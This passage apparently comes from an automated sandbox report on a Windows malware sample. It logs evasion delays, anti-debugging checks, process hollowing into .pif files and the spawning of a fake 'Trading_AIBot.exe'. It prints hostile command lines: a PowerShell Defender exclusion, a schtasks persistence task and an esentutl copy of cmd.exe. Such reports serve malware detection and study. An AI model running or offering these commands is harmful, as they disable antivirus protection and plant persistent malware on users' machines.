                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -200000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5240; Thread sleep count: 2205 > 30
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5240; Thread sleep count: 7627 > 30
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -99765s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -99656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -99547s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -198874s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -99328s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -99218s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -99109s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98998s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98890s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98672s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98562s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98344s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98234s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98015s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97906s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97797s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97687s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97578s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97469s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97359s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97250s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97140s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97030s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -99890s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -99781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -99672s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -99327s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -99172s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98812s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98514s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98406s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98187s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -98078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97967s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97859s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97750s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97637s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97422s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97312s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97202s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -97094s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 4012; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 5816; Thread sleep time: -26040000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 5816; Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 2_2_02DB5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99332
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99013
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98821
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98603
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98405
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98216
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97896
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97688
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97510
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97337
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97130
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99875
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99765
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99656
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99547
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99437
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99328
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99218
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99109
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98998
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98890
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98781
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98672
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98562
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98453
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98344
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98234
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98125
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98015
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97906
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97797
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97687
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97578
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97469
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97359
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97250
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97140
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97030
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99890
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99781
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99672
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99327
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 99172
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98812
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98625
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98514
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98406
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98297
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98187
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 98078
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97967
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97859
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97750
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97637
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97531
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97422
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97312
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97202
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 97094
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Thread delayed: delay time: 60000
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif; File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif; File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif; File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif; File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif; File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif; File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                      Source: x.exe, 00000002.00000002.2165746672.00000000007BE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWz
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.0000000005176000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW0h
                      Source: x.exe, 00000002.00000002.2165746672.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2165746672.000000000076E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2403789034.0000000005176000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2397017499.000000000090A000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
                      Source: Juqmtmya.PIF, 00000010.00000002.2330828270.00000000006FE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; API call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; API call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Process information queried: ProcessInformation

                      Anti Debugging

                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 2_2_02DCF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Process queried: DebugPort
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIF; Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
                      Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 2_2_02DC894C LoadLibraryW,GetProcAddress,FreeLibrary
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Code function: 9_2_00821130 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Code function: 9_2_00863F3D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Code function: 9_2_0040ADB0 GetProcessHeap,HeapFree
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif; Code function: 8_1_004015D7 SetUnhandledExceptionFilter
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Code function: 9_2_004123F1 SetUnhandledExceptionFilter
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Code function: 9_2_00861361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Code function: 9_2_00864C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\System32\wscript.exe File created: x.exe.0.dr
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIF Memory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
                      Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Section unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIF Section unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 2A4008
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIF Memory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 356008
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIF Memory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 244008
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 9_2_00848550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW,9_2_00848550
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,2_2_02DB5ACC
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetLocaleInfoA,2_2_02DBA7C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,2_2_02DB5BD8
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetLocaleInfoA,2_2_02DBA810
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: GetLocaleInfoA,9_2_00417A20
                      Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
